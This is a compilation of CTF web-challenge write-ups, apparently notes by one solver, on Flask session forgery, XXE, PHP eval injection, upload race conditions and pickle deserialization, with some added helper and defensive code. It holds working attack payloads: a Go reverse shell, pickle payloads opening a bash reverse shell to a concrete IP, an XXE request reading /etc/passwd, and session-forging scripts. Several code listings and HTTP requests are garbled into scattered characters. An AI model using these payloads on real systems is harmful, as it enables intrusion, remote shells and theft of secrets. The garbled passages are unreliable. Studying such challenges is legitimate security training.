neko@neko205 [flask_session]$ python3 flask_session_cookie_manager3.py decode -c "eyJ1c2VybmFtZSI6eyIgYiI6ImQzZDNMV1JoZEdFPSJ9fQ.Z8Kg2w.<sig>"
{u'username': u'www-data'}
neko@neko205 [flask_session]$ python3 flask_session_cookie_manager3.py encode -t "{u'username':u'fuck'}" -s "137.927888445"

Worth noting: this challenge has a trap, the app runs on Python 2. The seed gives the same MT19937 state in both versions, but Python 2's str() of a float prints 12 significant digits while Python 3 prints the shortest round-tripping repr, so the key string computed on Python 3 would be wrong.
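The Python 2 dependency can be removed. The following is an added example (not from the writeup) that reproduces the key on Python 3: the seed is the MAC as an integer, as uuid.getnode() returns it, and Python 2's str(float) is emulated with the 12-significant-digit "%.12g" format it used. The MAC used in the demonstration is a made-up Docker-style address, not the challenge's.

```python
import random


def py2_str_float(x: float) -> str:
    """Python 2 str(float): 12 significant digits, plus '.0' when the result looks integral."""
    s = "%.12g" % x
    if "e" not in s and "." not in s and s.lstrip("-").isdigit():
        s += ".0"
    return s


def mac_to_node(mac: str) -> int:
    """'02:42:ac:11:00:02' (as read from /sys/class/net/eth0/address) -> uuid.getnode() integer."""
    return int(mac.replace(":", "").replace("-", ""), 16)


def secret_key_for_mac(mac: str) -> str:
    """random.seed(uuid.getnode()); str(random.random()*233)  as the Python 2 app computed it.
    Integer seeds initialise MT19937 identically in Python 2 and 3; only str() differs."""
    rng = random.Random(mac_to_node(mac))
    return py2_str_float(rng.random() * 233)


if __name__ == "__main__":
    print(secret_key_for_mac("02:42:ac:11:00:02"))
```

Read the MAC through the file-read primitive, feed it to secret_key_for_mac, and the returned string is the value to pass as -s to the cookie manager.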

prize_p4

Visiting it gives an odd front end.

Entering anything at random reveals a /getkey route:

@app.route('/getkey', methods=["GET"])
def getkey():
    if request.method != "GET":
        session["key"] = SECRET_KEY

The key point:

if request.method != "GET":
    session["key"] = SECRET_KEY

If the method is anything but GET the key is written into the session. Flask automatically allows HEAD on every route that accepts GET, and inside the view request.method is then "HEAD", so a HEAD request passes the check and comes back with the key in the Set-Cookie header.

Response:

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Vary: Cookie
Set-Cookie: session=eyJrZXkiOiI3ZjRmYzkyZi02ODQxLTRjNTUtOWFiNS02MTljMWNmNDNjZDIifQ.Z8Km5Q.IUfbWhdra01xhzO_m1AMpzSDBoo; HttpOnly; Path=/
Server: Werkzeug/... Python/...
Date: ...
(remaining header values not legible in this copy)

Decode the session:

neko@neko205 [flask_session]$ python3 flask_session_cookie_manager3.py decode -c eyJrZXkiOiI3ZjRmYzkyZi02ODQxLTRjNTUtOWFiNS02MTljMWNmNDNjZDIifQ.Z8KlnA.dxaZ51rLcCOBhvOolWEVnfCItzE
b'{"key":"7f4fc92f-6841-4c55-9ab5-619c1cf43cd2"}'

That is the key; now decode the post-login cookie with it and forge:

neko@neko205 [flask_session]$ python3 flask_session_cookie_manager3.py decode -c eyJhZG1pbiI6ZmFsc2UsImRhdGEiOnsiIGIiOiJZUT09In0sInVybCI6ImEifQ.Z8KnaQ.qcnJz6q2IObJt85BTjXEDR76FEI -s "7f4fc92f-6841-4c55-9ab5-619c1cf43cd2"
{'admin': False, 'data': b'a', 'url': 'a'}
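The cookie manager used in this and the two earlier Flask-session challenges (flask?jwt?(hard), CISCN Web4) is a thin wrapper over itsdangerous. The following is an added example (not from the writeup or from that tool) that implements the same scheme directly: the payload is base64url JSON (zlib-compressed with a leading "." when that is shorter), the timestamp is a big-endian integer, and the signature is HMAC-SHA1 with a key derived as HMAC-SHA1(secret, "cookie-session"). Plain JSON is assumed; Flask's tagged serialisation of bytes/datetime values is not reproduced. The cookie decoded below is the one from this page.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib

PAGE_COOKIE = "eyJrZXkiOiI3ZjRmYzkyZi02ODQxLTRjNTUtOWFiNS02MTljMWNmNDNjZDIifQ.Z8KlnA.dxaZ51rLcCOBhvOolWEVnfCItzE"


def _b64(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def _unb64(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _split(cookie: str):
    compressed = cookie.startswith(".")          # itsdangerous marks zlib payloads with "."
    payload, ts, sig = (cookie[1:] if compressed else cookie).rsplit(".", 2)
    return compressed, payload, ts, sig


def decode_session(cookie: str) -> dict:
    """The payload is signed, not encrypted: no key needed to read it."""
    compressed, payload, _, _ = _split(cookie)
    raw = _unb64(payload)
    return json.loads(zlib.decompress(raw) if compressed else raw)


def session_timestamp(cookie: str) -> int:
    return int.from_bytes(_unb64(_split(cookie)[2]), "big")


def _signature(secret: str, signed_value: bytes) -> bytes:
    key = hmac.new(secret.encode(), b"cookie-session", hashlib.sha1).digest()   # key_derivation="hmac"
    return hmac.new(key, signed_value, hashlib.sha1).digest()


def verify_session(cookie: str, secret: str) -> bool:
    compressed, payload, ts, sig = _split(cookie)
    value = (("." if compressed else "") + payload + "." + ts).encode()
    return hmac.compare_digest(_signature(secret, value), _unb64(sig))


def sign_session(data: dict, secret: str, timestamp: int = None) -> str:
    raw = json.dumps(data, separators=(",", ":"), sort_keys=True).encode()
    comp = zlib.compress(raw)
    payload = ("." + _b64(comp)) if len(comp) < len(raw) - 1 else _b64(raw)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_b64 = _b64(ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big"))
    value = f"{payload}.{ts_b64}".encode()
    return f"{payload}.{ts_b64}.{_b64(_signature(secret, value))}"


if __name__ == "__main__":
    print(decode_session(PAGE_COOKIE), session_timestamp(PAGE_COOKIE))
    forged = sign_session({"admin": True, "data": "a", "url": "a"}, "7f4fc92f-6841-4c55-9ab5-619c1cf43cd2")
    print(forged, verify_session(forged, "7f4fc92f-6841-4c55-9ab5-619c1cf43cd2"))
```

verify_session(PAGE_COOKIE, key) is the quickest way to confirm that a leaked value really is the app's SECRET_KEY before building anything on it; decode_session and session_timestamp need no key at all, which is why a session cookie must never carry secrets, as /getkey does here.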

That gives access to the source.

(Application source, garbled in this copy. Legible parts: a Flask app with /getkey, a login flow that stores admin, data and url in the session, the read handler quoted below, and app.run(host='0.0.0.0').)

The key point:

@app.route('/...')
def read_file():
    if not session.get('admin'):
        return ...
    ...
    data = urllib.request.urlopen(...).read().decode('utf8')
    ...
(reconstructed outline: the admin check and the urlopen(...).read().decode('utf8') call are legible, the route name and the source of the URL are not)

An arbitrary file read, but not a direct one: the response only says "you get it" when the supplied string occurs in the file contents.

So it is a blind, character-by-character extraction.

(Extraction script, garbled in this copy: it loops over string.printable, sends each candidate prefix to the read route together with the forged session cookie, and appends the character whenever "you get it" appears in the response.)

[NSSRound#13 Basic]MyWeb

Read the code.

(Source, garbled in this copy. Legible parts: $mode and $value come from $_GET; mode=save appends the value to a PHP array literal kept in a file under /tmp via str_replace and mode=load passes that file through eval; the two statements quoted below are the ones that matter.)

I could not get it to work locally; per the writeup the point is

$data = str_replace(']', "','$value']", $data);
eval('$data = ' . $data . ';');

The goal is to make the code that eval runs become something like

$data = [""];system('rm -rf');];

The writeup gives a very neat way to do it:

?mode=save&value=]//%0a;print_r(getenv());//

%0a is the URL encoding of a newline, so the data written to /tmp becomes

[""]//
;print_r(getenv());];

The // comments out the rest of the first line, the newline starts a fresh statement, and the trailing // swallows whatever the original code appends. A clever command execution.

[NSSRound#8 Basic]Upload_gogoggo

wow, My.go (not really)

A file upload; after uploading, the response is

(Upload response, garbled in this copy: the file is stored under the upload directory with a timestamp-prefixed .png name.)

It is a compiled Go service, so try building a reverse shell in Go:

package main

import (
    "net"
    "os/exec"
)

func main() {
    conn, _ := net.Dial("tcp", "<attacker ip>:<port>")
    cmd := exec.Command("/bin/sh")
    cmd.Stdin = conn
    cmd.Stdout = conn
    cmd.Stderr = conn
    cmd.Run()
}
(the listener address in the original is not legible)

This challenge also hides a flag.

[GHCTF 2025] (>﹏<)

The description says it is XXE.

from flask import Flask, request
from lxml import etree

app = Flask(__name__)

@app.route('/', methods=['GET', 'POST'])
def index():
    if request.method == 'POST':
        xml_data = request.form.get('xml')
        parser = etree.XMLParser(resolve_entities=True, no_network=False)
        root = etree.fromstring(xml_data, parser)
        name = root.find('name').text
        return name if name is not None else "name"
    return ...

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=...)
(reconstructed from the garbled listing: the lxml parser with resolve_entities=True and no_network=False, the form field and the name element are legible; the GET response and the port are not)

At first the payload would not go through, and URL-encoding it did not help either. After some digging: encoding only the special characters is not enough, encode every byte of the body.

POST / HTTP/1.1
Host: (target)
Content-Type: application/x-www-form-urlencoded
Content-Length: ...

xml=%3c%3f%78%6d%6c%20%76%65%72%73%69%6f%6e%3d%22%31%2e%30%22%3f%3e%0d%0a%3c%21%44%4f%43%54%59%50%45%20%66%6f%6f%20%5b%0d%0a%20%20%20%20%3c%21%45%4c%45%4d%45%4e%54%20%66%6f%6f%20%41%4e%59%20%3e%0d%0a%20%20%20%20%3c%21%45%4e%54%49%54%59%20%78%78%65%20%53%59%53%54%45%4d%20%22%66%69%6c%65%3a%2f%2f%2f%65%74%63%2f%70%61%73%73%77%64%22%20%3e%0d%0a%5d%3e%0d%0a%3c%72%6f%6f%74%3e%0d%0a%20%20%20%20%3c%6e%61%6d%65%3e%26%78%78%65%3b%3c%2f%6e%61%6d%65%3e%0d%0a%3c%2f%72%6f%6f%74%3e

which decodes to

<?xml version="1.0"?>
<!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<root>
    <name>&xxe;</name>
</root>
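An added example (not from the writeup) that produces the request body above byte for byte, decodes it the way the server's form parser does, and shows the check a defender would put in front of etree.fromstring: a DTD that declares an external (SYSTEM or PUBLIC) entity. The document is the one on the page; the form field name "xml" is taken from the captured request.

```python
import re
from urllib.parse import unquote_to_bytes

XXE_DOC = (
    '<?xml version="1.0"?>\r\n'
    '<!DOCTYPE foo [\r\n'
    '    <!ELEMENT foo ANY >\r\n'
    '    <!ENTITY xxe SYSTEM "file:///etc/passwd" >\r\n'
    ']>\r\n'
    '<root>\r\n'
    '    <name>&xxe;</name>\r\n'
    '</root>'
)


def percent_encode_all(s: str) -> str:
    """Encode every byte, letters included, as the body on the page does (lowercase hex)."""
    return "".join(f"%{b:02x}" for b in s.encode())


def build_request_body(xml: str = XXE_DOC, field: str = "xml") -> str:
    return f"{field}={percent_encode_all(xml)}"


def decode_form_body(body: str) -> dict:
    """Server side: application/x-www-form-urlencoded -> {field: value}."""
    out = {}
    for pair in body.split("&"):
        k, _, v = pair.partition("=")
        out[unquote_to_bytes(k.replace("+", " ")).decode()] = unquote_to_bytes(v.replace("+", " ")).decode()
    return out


# External entity declaration: <!ENTITY name SYSTEM "..."> or <!ENTITY name PUBLIC "..." "...">
ENTITY_RE = re.compile(r"<!ENTITY\s+\S+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)


def has_external_entity(xml: str) -> bool:
    """Cheap pre-parse check; the real fix is XMLParser(resolve_entities=False, no_network=True)."""
    return ENTITY_RE.search(xml) is not None


if __name__ == "__main__":
    body = build_request_body()
    print(body[:80])
    print(decode_form_body(body)["xml"] == XXE_DOC, has_external_entity(XXE_DOC))
```

The regex is a detection aid only: parameter entities and entities declared in an external DTD slip past it, so the parser configuration, not the check, is what closes the hole.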

[FSCTF 2023]加速加速

Race condition; it takes a bit of luck and a fast connection.

It takes two requests.

P H C C U O C U A R A A C C C < C O o o a p r o s c e c c o o o ? o S s n c g i n e c f c c n n n = n T t t h r g t r e e e e n t t ` t : e e a i e - p r p p e e e n e / n - d n n A t e t t c - n n l - n - n t C e : t g : r - - t W t t W t W H o - o - - e : E L i e - - / e - e T d L n I h T n t n a o b D T f b D b T e e t n t y t e h c n n K i y * K i K P 4 n r s t p : x t o g : i s p ` i s i / . g o e p e t t d u t p e ; t p t 1 a t l c : : M p i a c F o : F o F . n h : u / h : n g l o s o s o 1 n : r / m z t / g e o r i i r i r a m e n u i m / : : s m t m m t m . 3 a - o l l l n e B i a B i B n 3 x R d t l , o g z o o g o o o s 0 - e e i a a d z h u n e u n u s a q 4 p / p e i - n : / n : n c g u . a 5 p 4 p C d p d d t e e a r . l . , N a f n a f a f = s n t 0 i a , r o g r o r . 0 t n / c n d z y r y r y c s a f ( a n e h N m N m N n : . o W t a f ; E - E - E : n r i i . l q b d b d b 2 1 s m n o n a = f a f a f 8 s - d n s t 0 b t b t b 5 c d o / s e . 9 a 9 a 9 2 t a w x c , 9 D ; D ; D 8 f t s h t j j j . a t f b L n L n L c ; N m . r R a R a R n T l c E m E m E : b + n x e x e x 2 o 1 x : W = W = W 8 u 0 m 2 d " d " d 5 n . l 8 7 u 7 s 7 2 d 0 , 5 W p W u W 8 a ; a 2 l b - r p 8 o m - y W p / a i = i l d t - n i _ " - 6 c f - 4 a i - ; t l W i e e x o " b 6 n ; K 4 / i ) x f t m i F A l l o p ; e r p q n m l = a B e 0 m o W . e u e 9 = n b , " d K i 1 a i m . r t a p y / g h N 5 e p E 3 / " b 7 a f . v b 3 i 9 6 f D , j ( i L K m R H a E T g x M e W L / d , w 7 e W l b i p k , e i m G a e g c e k a p n C g h , r * o / m * e ; / q 1 = 2 0 1 . . 8 0 , . a 6 p 1 p 6 l 7 i . c 8 a 5 t i S o a n f / a s r i i g / n 5 e 3 d 7 - . e 3 x 6 c h a n g e ; v = b 3 ; q = 0 . 7

The upload request

G H A U U A A E o c p s c c T s c g e c c t e r r e e / : p a - p p u t d A t t p n - e g : - l o L - e E o d a I n t n a e n n t e c d 4 g s : x o / . u e t d 1 a a c M i . n g u h n p n e r z t g h a : e i m : p . - l l n z R l , g H s h e a a z T s - q / p i T c C u 5 p p P t N e . l , / f , s 0 i 1 . z t c d . c h s ( a e 1 n ; : X t f : q 1 i l 2 = 1 1 o a 8 0 ; n t 5 . / e 2 9 L x 8 i h n t u m x l + x x 8 m 6 l _ , 6 a 4 p ) p l A i p c p a l t e i W o e n b / K x i m t l / ; 5 q 3 = 7 0 . . 3 9 6 , i ( m K a H g T e M / L a , v i l f i , k i e m a G g e e c / k w o e ) b p C , h i r m o a m g e e / / 1 a 3 p 4 n . g 0 , . * 0 . * 0 ; q S = a 0 f . a 8 r , i a / p 5 p 3 l 7 i . c 3 a 6 t i o n / s i g n e d - e x c h a n g e ; v = b 3 ; q = 0 . 7

The read request

After the file is uploaded it exists on the server for a short moment before it is deleted; if a read request arrives during that window, there is a chance it is served.

Race condition

In some poorly designed upload flows the uploaded file is saved first and only then checked for risk; if it is judged risky it is deleted. By sending a large number of requests, the file can be accessed before the deletion happens, which counts as a successful attack.
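To make that window concrete, here is an added simulation (not code from the challenge) of save-then-check handling next to check-then-publish handling. The concurrent reader is modelled by a callback invoked inside the check window, so the outcome is deterministic; the sample uploads and the toy risk check are constructed.

```python
import os
import shutil
import tempfile

# Constructed sample uploads (not from the challenge): one the post-upload
# scan should reject, one it should accept.
RISKY_UPLOAD = b"<?php echo 'this is not an image'; ?>"
CLEAN_UPLOAD = b"\x89PNG\r\n\x1a\n...constructed image bytes..."


def looks_dangerous(data: bytes) -> bool:
    """Toy stand-in for the server's post-upload risk check."""
    return b"<?php" in data


def read_if_present(path: str):
    """Models the concurrent read request: file content if reachable, else None."""
    try:
        with open(path, "rb") as f:
            return f.read()
    except FileNotFoundError:
        return None


def vulnerable_upload(webroot: str, name: str, data: bytes, racer):
    """Save-then-check, as in the challenge: the file sits in the web root
    while the check runs. racer(path) is called inside that window."""
    path = os.path.join(webroot, name)
    with open(path, "wb") as f:
        f.write(data)
    seen = racer(path)                 # a reader arriving now is served the file
    if looks_dangerous(data):
        os.remove(path)                # too late: it was already read
        return False, seen
    return True, seen


def hardened_upload(webroot: str, name: str, data: bytes, racer):
    """Check-then-publish: scan in a private quarantine directory and move
    the file into the web root only after it passes."""
    path = os.path.join(webroot, name)
    with tempfile.TemporaryDirectory() as quarantine:
        staged = os.path.join(quarantine, name)
        with open(staged, "wb") as f:
            f.write(data)
        seen = racer(path)             # nothing is reachable at `path` yet
        if looks_dangerous(data):
            return False, seen         # the staged copy dies with the temp dir
        shutil.move(staged, path)      # published only after the check passed
    return True, seen


def demo() -> dict:
    """Run both handlers against the sample uploads and report what the
    racing reader saw and whether the file ended up in the web root."""
    results = {}
    with tempfile.TemporaryDirectory() as webroot:
        def run(label, handler, name, data):
            ok, seen = handler(webroot, name, data, read_if_present)
            results[label] = (ok, seen, os.path.exists(os.path.join(webroot, name)))
        run("vulnerable_risky", vulnerable_upload, "shell.php", RISKY_UPLOAD)
        run("hardened_risky", hardened_upload, "shell.php", RISKY_UPLOAD)
        run("hardened_clean", hardened_upload, "pic.png", CLEAN_UPLOAD)
    return results


if __name__ == "__main__":
    for label, (accepted, seen, on_disk) in demo().items():
        print(f"{label:16} accepted={accepted} racer_saw={seen is not None} on_disk={on_disk}")
```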

[羊城杯 2020]Blackcat

Let's look at the code first.

i } $ i $ i } e f c f h f c ( l ( h ( h e a i $ o m d n s $ = h d p i d s c h i e t e e e l h e x y ( s t a a ! ( e ( ' t ( n s = ' c $ i $ d h = ( _ n _ e _ " P e P s h $ n O O t m _ c S = S i a P " T T n c O . [ g [ e ( S $ ' e ' ' T _ B t W = s [ P l e h h ' O a n i h a B S c v t a 2 l T k ( e s 5 a [ - ' " - h 6 c ' C ) c c _ ' k O a ; l a h , - n t a t m C e - n - a $ a - S d m c _ t e h e o ( P - a e s n ' O S r r t i s S h ' i i t h T e ] f n o a [ r ) f e r 2 ' i ; ' " ' 5 O f ] ) ] 6 n f ) ; ) ' e ' ) , - ] e ) / $ a { _ r e P ' m e O ] p n S , t v T y [ $ ( c ' c $ l W l _ a h a P n i n O d t d S e e e ' T s - s ) [ t c t ; ' i a i O n t n n e - e e m ) - o ; e n a i r t ' o ] r ) ' ) ] { , $ c l a n d e s t i n e ) ; / / W h i t e - c a t - m o n i t o r $ c l a n d e s t i n e n u l l

The key part

i $ f h ( h i s $ = s c e l h t a a ( n s $ d h _ e _ P s h O t m S i a T n c [ e ( ' ' W = s h h i h a t a 2 e s 5 - h 6 c _ ' a h , t m - a $ m c _ o ( P n ' O i s S t h T o a [ r 2 ' ' 5 O ] 6 n ) ' e ) , - e $ a _ r P ' O ] S , T [ $ ' c W l h a i n t d e e - s c t a i t n - e m ) o ; n i t o r ' ] , $ N c U l L a L n , d e s $ t h i h n e ) ; / / W h i t e - c a t - m o n i t o r $ c l a n d e s t i n e n u l l

If the White-cat-monitor parameter is passed as an array, $clandestine ends up null, and the hash_hmac result below it becomes predictable.

payload:

<?php
echo hash_hmac('sha256', ';cat f*', null);

White-cat-monitor[]=lll&Black-Cat-Sheriff=34f325915b5364676ea279c70063955267e6d46af6ad76c9723750a8f3f2954e&One-ear=;cat f*

[MTCTF 2022]easypickle

Let's look at the code first.

i i f i i a a @ d @ d i m m r m m p p a e a e f p p o p p p p p f p f o o m o o . p p r r r r = c . h i r . a i e _ a t t f t t o r e f e r d f l n p l F n o l t o m s a p b p a o r l f u l n u u i s e m . a i s s a a i t o o s r t n e r : t e e r s c k n s g e _ t e n e ( s e r x _ u e k d k [ ( w s ( ) s t y c _ n 6 l i o ( ' ' s s ' ' : i u : e ( 4 e m m _ S r e i H / o r a i p r p r = h p _ E l s o e a n n f i e t e = o o n C d s n l d . = c t : t s r a R ( i [ l m g f b k u u t t m E ) o ' o i e " b ' r l r r = e T : n u n t < a R a e n n _ ' F _ _ . s { ' ( s s ' i . m 0 l _ K g e } ) ' c e s l " " a . a ) E e r ! u r 6 i e o o e i 0 s Y t ' ' s i 4 n a k r n . k ' ( ] . e p . p d " r _ 0 , ] ' f r t b a i s o _ . u = o ' > 6 c ( r ' 0 s = s r ) a 4 o k b ! : ' e e m l d r l a " , s o r a ! e e e s s s ' . t = r c b . e p i . ) j ( t o ' U 6 o o u : o s " ( d i n 4 r n r i e a ' e ' p . t a n s d A ( i b = n ( s m c s i c 6 8 d r i i c e n k 4 8 o a o n e s l d 8 m n n " s s a i e 8 ( d [ : s i n c ) 2 o ' o o g o ) m u D n r E d . . s e . r e h c e n g b r ( e h r i e ' o s x o ' e t o r e ( i ] d ( ' ( s ) c ) ' ' " s e ) s i R i s ; e n o ( w r i n " i _ a . a n d g d d a o e m o t r b t i w a ( n . ' b i ' " l ) ' s s , o ) b e c . ' f r k a r o _ = t e i r d 5 i p n b a ) o l i t ) n a a d a . c : d ' h e e ) r ( n ) e b " ) f " ) = b # ' u / i ' l < t / i s n c " r , i p b t " > B " u I l t I n " ) . r e p l a c e ( b " o s " , b " O s " ) . r e p l a c e ( b " b y t e s " , b " B y t e s " )

The first thing that stands out is the pickle.loads call, which deserializes the input; then app.config['SECRET_KEY'] = os.urandom(2).hex(), which suggests session forgery.

First, the session key generation logic

app.config['SECRET_KEY'] = os.urandom(2).hex()

A random value: two bytes rendered as hex.

# 0x1:0000 = 65536
with open("hex_dict.txt", "w") as f:
    for i in range(0x10000):
        hex_str = f"{i:04x}"
        f.write(hex_str + "\n")

Brute force gives the key

neko@aosc-neko205 [ ~ ] $ flask-unsign --unsign --cookie "eyJ1c2VyIjoibmRhYW0ifQ.Z9aImg.6PzIAA8JO6-ax3hP7wgKVggt0p4" --wordlist hex_dict.txt
[*] Session decodes to: {'user': 'ndaam'}
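Why the brute force above finishes instantly, as an added example that is not the challenge's code: the signing scheme below is written out by hand, modelled on the Flask/itsdangerous defaults (SHA-1 HMAC, "django-concat" key derivation, salt cookie-session), so treat the exact cookie format as an assumption; the key-space arithmetic is the point. The secret and timestamp are constructed.

```python
import base64
import hashlib
import hmac
import json

SALT = b"cookie-session"          # the salt Flask uses for its session cookie
FIXED_TIMESTAMP = 1711111111      # constructed; real cookies carry the signing time


def b64(data: bytes) -> str:
    """URL-safe base64 without padding, as itsdangerous encodes its fields."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def derive_key(secret_key: bytes) -> bytes:
    """itsdangerous' default 'django-concat' key derivation (assumption, not imported)."""
    return hashlib.sha1(SALT + b"signer" + secret_key).digest()


def sign(payload: dict, secret_key: bytes) -> str:
    """Build a cookie shaped base64(json).base64(timestamp).signature."""
    body = b64(json.dumps(payload, separators=(",", ":")).encode())
    stamp = b64(FIXED_TIMESTAMP.to_bytes(4, "big"))
    value = f"{body}.{stamp}".encode()
    sig = hmac.new(derive_key(secret_key), value, hashlib.sha1).digest()
    return f"{value.decode()}.{b64(sig)}"


def verify(cookie: str, secret_key: bytes) -> bool:
    """Recompute the HMAC for a candidate key and compare in constant time."""
    value, _, sig = cookie.rpartition(".")
    expected = hmac.new(derive_key(secret_key), value.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(b64(expected), sig)


def brute_force_two_byte_secret(cookie: str):
    """os.urandom(2).hex() yields one of only 0x10000 = 65536 strings;
    trying every one of them offline takes well under a second."""
    for i in range(0x10000):
        candidate = f"{i:04x}".encode()
        if verify(cookie, candidate):
            return candidate
    return None


def keyspace_bits(num_random_bytes: int) -> int:
    """Work factor for os.urandom(n).hex(): the hex string carries exactly 8*n bits."""
    return 8 * num_random_bytes


if __name__ == "__main__":
    weak_secret = b"1f2e"                      # constructed: a possible urandom(2).hex()
    cookie = sign({"user": "ndaam"}, weak_secret)
    print("recovered:", brute_force_two_byte_secret(cookie))
    print("bits for urandom(2):", keyspace_bits(2), "vs urandom(32):", keyspace_bits(32))
```

Once the key is recovered, sign() forges any payload the server will accept, which is why the fix is a long random secret (os.urandom(32) or more), not a different hash.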

Next comes the deserialization; let's look at the logic.

t r y : e x c e a i p r p r f i e t e = c t : t b k u u b ' r l r r a R a e n n s ' i . e s l " " 6 i e o o e 4 n a k r . p d " r b a i s o 6 c ( r 4 o k b ! d r l a " e e s c b . e o ' U 6 d i n 4 e ' p . ( i b s i c 6 e n k 4 s l d s a i e i n c o o g o n r E d . r e g b r ( e ' o s t o r e ( ' ( s ' " s s i R i e n o r i n _ a . d g a o e t r b t a ( ' b i ' ) ' s s ) b e . ' f r r o _ e i r d p n b a l i t a a d a c : d ' e e ) ( n ) b " ) " ) b u i l t i n " , b " B u I l t I n " ) . r e p l a c e ( b " o s " , b " O s " ) . r e p l a c e ( b " b y t e s " , b " B y t e s " )

Nothing complicated: it takes ser_data from the session and replaces builtin with BuIltIn, os with Os, and bytes with Bytes.

payload

Ignoring the bypass for now, build the payload first; since there is no output, a reverse shell is the only way to get a connection.

{'user': 'admin', 'ser_data': 'Y3Bvc2l4CnN5c3RlbQpwMAooVnNoIC1pID4mIC9kZXYvdGNwLzQ1LjE5Mi4xMTAuMjQvOTAwMSAwPiYxCnAxCnRwMgpScDMKLg=='}
1 1 1 6 6 6 6 6 7 0 4 7 8 1 4 5 8 9 2 : : : : : : : : : : c p ( V p t p R p . G P M P R P S L U A U E U T O T R T D T O B K U P A U P T C L N U U E I T P C L O E D E ' 0 2 3 p o s i ' 1 ( x s M h A s R y - K s i t a e > t m & ' 1 / 7 d ) e v / t c p / 1 . 1 . 1 . 1 / 9 0 0 1 0 > & 1 '

Sending it returns an error; debugging showed it triggers the WAF. I tried for a long time without getting past it; the writeup I checked later built the opcode by hand, which is honestly a bit beyond the syllabus.

1 1 2 2 3 4 4 4 0 1 9 7 8 5 6 7 3 4 5 : : : : : : : : : : : ( S S d S ( c V s . b ' ' ' M S M S S ( A T A E T S R R R T O ' K I K I P k S S D N G U O T e T T I G L N B E y R R C O I J M 1 I I T B C ' N N A O \ G G L D n E S ' v v u a l l ' ( ' ' ( 1 k v M o c M ' e a A s a A \ y l R l R n 1 1 K s c K d ' ' y ' S a s a ' t t t v e u 0 m 2 l ) ' 5 ' ) \ n ( c o s \ n s y s t e m \ n V c a l c \ n o s . ' ' '

Bypass successful. For the reverse shell, since -i is needed, unicode escapes can be used.

b'''(S'key1'\nS'val1'\ndS'vul'\n(cos\nsystem\nV\u0073\u0068\u0020\u002d\u0069\u0020\u003e\u0026\u0020\u002f\u0064\u0065\u0076\u002f\u0074\u0063\u0070\u002f\u0034\u0035\u002e\u0031\u0039\u0032\u002e\u0031\u0031\u0030\u002e\u0032\u0034\u002f\u0039\u0030\u0030\u0031\u0020\u0030\u003e\u0026\u0031\nos.'''

Base64-encode it, write it into the session, and send it.

One big pitfall: sh on this target cannot use the /dev/tcp pseudo-device, so it has to be wrapped in another layer of bash, i.e.

bash -c 'sh -i >& /dev/tcp/45.192.110.24/9001 0>&1'

Then convert it to unicode escapes as above.

[HZNUCTF 2023 preliminary]pickle

Another deserialization challenge; look at the code first.

i i f a @ d @ d @ d i m m r p a e a e a e f p p o p p f p f p f o o m p p p r r = . i w . g p p r . r f w _ a t t f r n i r e a i e r e i i n p l F o d t o t y c t o a l t a p b p a l u e h u F l k u u d e h m . a i s a t x r t l o l r t F n r e r s c k s e ( o e e a a e n e i a o e _ u e k k ( ) p t ( g d . ( l m p t _ n 6 l i ( ' : e u ' ( l " ' e e e u ( 4 e m _ / n r / ) = o g / ( n r = h p _ ' ( n c : a a r ) = ( n = o o n ) ' a r d n e : f s r a a f l e s b a r i f t t m p . c q ( a d e l . = e p r ' u b d F q e r _ ' F _ . e , e a i i u n e m 0 l _ p a s s e l e a a a . a ) y d m t e ! e s m d i 0 s ' ( e . 6 " ' t e ( n . k , ) t a 4 , . , ) _ 0 , h r . # a _ . ' o g b m r ' ' 0 r r d s 6 e g r : ' e ' s . 4 t s ' ) q ) = g d h . ) u [ e e o g e a ' t c d e a s s G ( o s t s t E " d = ( f T p e [ ' f : ' a ( ' f : ] y p G i ) l a E l # o y T e a l ' n d o ] a " a ) m f ) d e l ) ' a . ) g r . e r p e l p a l c a e c ( e b ( ' " o f s l ' a , g " b , ' ' " ) ? ) ? ? ? " )

One function is an arbitrary file read, the other is deserialization.

pickle.loads(base64.b64decode(payload).replace(b'os', b''))

It filters out os.

This can be bypassed via eval: write the command output to a file, then read it back with the file-read function.

import pickle
import base64

class A(object):
    def __reduce__(self):
        return (eval, ("__import__('o'+'s').system('env|tee a')",))

payload = base64.b64encode(pickle.dumps(A()))
print(payload)
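Why a byte-level denylist such as replace(b'os', b'') cannot hold, as an added example that is not the challenge's code: the forbidden name is assembled at load time, so the bytes never occur in the pickle, whereas an allow-listing Unpickler.find_class refuses every global that is not plain data. The payload here only evaluates a string expression, standing in for the command-running version above; the sample session data is constructed.

```python
import builtins
import io
import pickle


# Constructed payload (not the challenge's): a __reduce__ that makes the
# unpickler call builtins.eval. The expression only assembles the string
# "os" at load time, which stands in for the command-running version above.
class AssembledName:
    def __reduce__(self):
        return (eval, ("'o' + 's'",))


def denylist_filter(data: bytes) -> bytes:
    """The challenge's mitigation: strip the literal bytes 'os' from the pickle."""
    return data.replace(b"os", b"")


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list mitigation: only plain data constructors may be imported
    while unpickling; eval, os.system and every other global are refused."""
    ALLOWED = {
        ("builtins", name)
        for name in ("dict", "list", "set", "frozenset", "tuple", "str",
                     "bytes", "int", "float", "bool")
    }

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def demo() -> dict:
    payload = pickle.dumps(AssembledName())
    results = {
        # the literal bytes never occur, so the filter changes nothing ...
        "filter_changed_payload": denylist_filter(payload) != payload,
        # ... and the denylisted loader still hands control to eval
        "denylist_result": pickle.loads(denylist_filter(payload)),
    }
    try:
        restricted_loads(payload)
        results["allowlist_blocked"] = False
    except pickle.UnpicklingError:
        results["allowlist_blocked"] = True
    # ordinary session data still round-trips through the restricted loader
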